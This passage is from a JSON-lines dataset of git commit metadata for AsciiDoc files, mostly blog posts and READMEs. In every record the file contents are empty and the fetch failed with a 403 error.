'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6706cfcf8fe8090f236335893b043dc64188a27","subject":"Update 2016-06-28-Contact.adoc","message":"Update 2016-06-28-Contact.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-Contact.adoc","new_file":"_posts\/2016-06-28-Contact.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e50adbeded65497dbdc24d103034ccd2ea1e298","subject":"2016-07-08-America.adoc","message":"2016-07-08-America.adoc\n","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-08-America.adoc","new_file":"_posts\/2016-07-08-America.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34f868868ca96eb7865d7579a90388438b10c541","subject":"Update 2017-01-15-A-title.adoc","message":"Update 2017-01-15-A-title.adoc","repos":"flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io","old_file":"_posts\/2017-01-15-A-title.adoc","new_file":"_posts\/2017-01-15-A-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flipswitchingmonkey\/flipswitchingmonkey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"089d51a130d93c9f6b077f913746c1280e5efaad","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c07ffe5f848433d3bab48727e4b41f7311b409f","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50806ebcea6e8f279e4182f81b568937333a4a03","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50c8eb0a84509bf09065e5331c6ea5cff63311a5","subject":"Update 2017-08-22-No-Whammies.adoc","message":"Update 2017-08-22-No-Whammies.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-08-22-No-Whammies.adoc","new_file":"_posts\/2017-08-22-No-Whammies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0286cb6548501277b57d1494aede2778df8e45a1","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 
2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fc6824d882469bedf3f353d0235b6690dc7cd14","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b1176b9695127c08f28e974153ce48de1430c1f","subject":"Publish DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","message":"Publish DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_file":"DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"067d8ac3eb5cbe8fad087857cd38a5e0ec32319a","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb069dad494d57f91e695d1dcbbad5a809b8ad9a","subject":"Update 2017-10-20-Your-Blog-title.adoc","message":"Update 2017-10-20-Your-Blog-title.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2017-10-20-Your-Blog-title.adoc","new_file":"_posts\/2017-10-20-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66f54b7bdf1bc02dfdfd31553e326a7f0860d239","subject":"Update 2018-01-16-Azure-9.adoc","message":"Update 2018-01-16-Azure-9.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-16-Azure-9.adoc","new_file":"_posts\/2018-01-16-Azure-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71b725fd783971c57b93bed24a232243d2dd0fb9","subject":"#58 added initial doc to fix build","message":"#58 added initial doc to fix build\n","repos":"openwms\/org.openwms.tms.transportation,openwms\/org.openwms.tms.transportation","old_file":"src\/main\/asciidoc\/api.adoc","new_file":"src\/main\/asciidoc\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openwms\/org.openwms.tms.transportation.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4a815bdc93d606f6e44c78ce556b5c5568a19d11","subject":"Update 2015-08-25-Uberkonsum.adoc","message":"Update 2015-08-25-Uberkonsum.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"161735d674c37f208a985467b4fb7c180c1ba4c7","subject":"Update 2015-10-13-Blog-Title.adoc","message":"Update 2015-10-13-Blog-Title.adoc","repos":"MinxianLi\/hubpress.io,MinxianLi\/hubpress.io,MinxianLi\/hubpress.io","old_file":"_posts\/2015-10-13-Blog-Title.adoc","new_file":"_posts\/2015-10-13-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MinxianLi\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf0affeebdc6d062008756d575bfc40ec525dfd5","subject":"Update 2016-6-26-first-title.adoc","message":"Update 2016-6-26-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-first-title.adoc","new_file":"_posts\/2016-6-26-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b65d82bb3c52dc81cabf2b94e299e40ba191281","subject":"Update 2016-05-14-How-to-Blog.adoc","message":"Update 2016-05-14-How-to-Blog.adoc","repos":"TinkeringAlways\/tinkeringalways.github.io,TinkeringAlways\/tinkeringalways.github.io,TinkeringAlways\/tinkeringalways.github.io,TinkeringAlways\/tinkeringalways.github.io","old_file":"_posts\/2016-05-14-How-to-Blog.adoc","new_file":"_posts\/2016-05-14-How-to-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TinkeringAlways\/tinkeringalways.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"198e82bf897dfd1be1bb469913c1591a44c93cdd","subject":"Update 2016-09-06-Test-Post-1.adoc","message":"Update 
2016-09-06-Test-Post-1.adoc","repos":"thomasgwills\/thomasgwills.github.io,thomasgwills\/thomasgwills.github.io,thomasgwills\/thomasgwills.github.io,thomasgwills\/thomasgwills.github.io","old_file":"_posts\/2016-09-06-Test-Post-1.adoc","new_file":"_posts\/2016-09-06-Test-Post-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasgwills\/thomasgwills.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae722010219cdda454b5a7803e57753ce55572ff","subject":"Mark the docu","message":"Mark the docu\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f7c023a7b4e4150a3290b961c06dfbaad48febec","subject":"Updated documentation","message":"Updated documentation\n","repos":"goldobin\/resilience4j,resilience4j\/resilience4j,drmaas\/resilience4j,storozhukBM\/javaslang-circuitbreaker,mehtabsinghmann\/resilience4j,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b02623b10d7d0c2c65a789b1171a4e8cd1ce51a8","subject":"chore: add badges","message":"chore: add badges\n","repos":"gravitee-io\/gravitee-plugin-core","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-plugin-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc4003920929d6f98b478e96a3fd5645e0af9567","subject":"Explicitly suggest using of official images","message":"Explicitly suggest using of official images\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb4345b97c8d8ef29162d399b3aa3b888b2377bd","subject":"Added coveralls badge to README","message":"Added coveralls badge to README\n","repos":"adi9090\/javaanpr,adi9090\/javaanpr,justhackit\/javaanpr,joshuagn\/ANPR,joshuagn\/ANPR,justhackit\/javaanpr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"43211852ccf17a88435771feb847123100f80243","subject":"Fix awkward wording","message":"Fix awkward wording\n","repos":"pjanouch\/sensei-raw-ctl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/pjanouch\/sensei-raw-ctl.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"e4f70cde74563028745b9344915ebbf5772465a2","subject":"Create README.adoc","message":"Create README.adoc","repos":"polyglot-plt\/tools.compiler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/polyglot-plt\/tools.compiler.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ac992d40a8f28f4e421af088dca8f6c795bb2ba1","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b938a7b9ad611c25a9e7a56c1a5518c68878c7e3","subject":"docs: Fixed version and a typo in the quick start tutorial.","message":"docs: Fixed version and a typo in the quick start tutorial.\n","repos":"miminar\/atomic-enterprise,projectatomic\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,miminar\/atomic-enterprise,markllama\/atomic-enterprise,projectatomic\/atomic-enterprise,miminar\/atomic-enterprise,marsmensch\/atomic-enterprise,miminar\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,miminar\/atomic-enterprise,markllama\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,marsmensch\/atomic-enterprise,marsmensch\/atomic-enterprise,marsmensch\/atomic-enterprise,projectatomic\/atomic-enterprise,marsmensch\/atomic-enterprise,markllama\/atomic-enterprise,miminar\/atomic-enterprise,markllama\/atomic-enterprise,projectatomic\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,projectatomic\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,marsmensch\/atomic-enterprise,projectatomic\/atomic-enterprise,markllama\/atomic-enterprise,markllama\/atomic-enterprise","old_file":"docs\/quick-start-tutorial.adoc","new_file":"docs\/quick-start-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/projectatomic\/atomic-enterprise.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d0a9343f754408330cc15e4a63d4c99bd6308c6","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19577433f7fc18f7fc8ddcc10261e78ab6b3eade","subject":"cheatsheet reference","message":"cheatsheet 
reference\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"CheatSheets.adoc","new_file":"CheatSheets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"8ca6fd9a75e460622f354fa36a5e1b260c3d2700","subject":"Update 2015-02-22-Blog-Title.adoc","message":"Update 2015-02-22-Blog-Title.adoc","repos":"hemantthakur\/hemantthakur.github.io,hemantthakur\/hemantthakur.github.io,hemantthakur\/hemantthakur.github.io","old_file":"_posts\/2015-02-22-Blog-Title.adoc","new_file":"_posts\/2015-02-22-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hemantthakur\/hemantthakur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d30643e7993565995e0166ff479b5665f87d926","subject":"Update 2015-08-25-Uberkonsum.adoc","message":"Update 2015-08-25-Uberkonsum.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"158fb5e8b0da9c41d035a0133bdac64e889f5612","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46d3c49ba0d05327a7a3675064b3af3f2fd2ce26","subject":"Update 2015-08-25-Uberkonsum.adoc","message":"Update 2015-08-25-Uberkonsum.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3a8712f9dfc66653dbffd666df34bb4ce9fb620","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5950f84cb457ed7b19b65e2041b137934608caf6","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 
2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53821e22e5fc2130993fefed3f6771577c5ad039","subject":"Serial","message":"Serial\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a92e309f45420187ad8f7466160d0c2c5a64557","subject":"Add list of 3rd party libraries","message":"Add list of 3rd party libraries\n","repos":"MSG134\/IVCT_Framework,MSG134\/IVCT_Framework,MSG134\/IVCT_Framework","old_file":"docs\/src\/7-3rdparty-libraries.adoc","new_file":"docs\/src\/7-3rdparty-libraries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MSG134\/IVCT_Framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ee5350220d95e747740f2843bce016ae30653cd","subject":"Don't use string directly as symbol name","message":"Don't use string directly as symbol name\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2b8e5c7d8af46bb59597b62d5b98b695d9599732","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87208dc87cc01278984602c6161da2edf4bba664","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"afe01113e23425bfc082854b61b4950d3c2afd22","subject":"Digital assets second pre-draft | Attempt to solve the firsts attack strategies","message":"Digital assets second pre-draft | Attempt to solve the firsts attack strategies\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/fermat_dap\/La construcci\u00f3n de un Digital Asset.asciidoc","new_file":"fermat-documentation\/fermat_dap\/La construcci\u00f3n de un Digital Asset.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b43bf0ef9b76db4d1a2af7f7e727379e49b93fc","subject":"Update 2015-05-06-Simplemente-Java.adoc","message":"Update 2015-05-06-Simplemente-Java.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-06-Simplemente-Java.adoc","new_file":"_posts\/2015-05-06-Simplemente-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Wurser\/wurser.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3b56eef518e6052c758b9eccacd4f57ef7834c8","subject":"Update 2015-09-27-Titel.adoc","message":"Update 2015-09-27-Titel.adoc","repos":"ice09\/ice09ng,ice09\/ice09ng,ice09\/ice09ng,ice09\/ice09ng","old_file":"_posts\/2015-09-27-Titel.adoc","new_file":"_posts\/2015-09-27-Titel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ice09\/ice09ng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9119f15667a2bc6ac6002f04d7a412fc679c1d15","subject":"Update 2015-12-23-Aurelia-orm-Getting-started.adoc","message":"Update 2015-12-23-Aurelia-orm-Getting-started.adoc","repos":"RWOverdijk\/rwoverdijk.github.io,RWOverdijk\/rwoverdijk.github.io,RWOverdijk\/rwoverdijk.github.io","old_file":"_posts\/2015-12-23-Aurelia-orm-Getting-started.adoc","new_file":"_posts\/2015-12-23-Aurelia-orm-Getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RWOverdijk\/rwoverdijk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21bdac62cb56b3c5e100ecd344cc227d593277c8","subject":"y2b create post Apogee Duet 2 Unboxing \\u0026 Overview","message":"y2b create post Apogee Duet 2 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-19-Apogee-Duet-2-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-05-19-Apogee-Duet-2-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adb0a76e78a0540e73dd4ea78f2287fd9e55cbdb","subject":"Added a readme","message":"Added a readme\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 
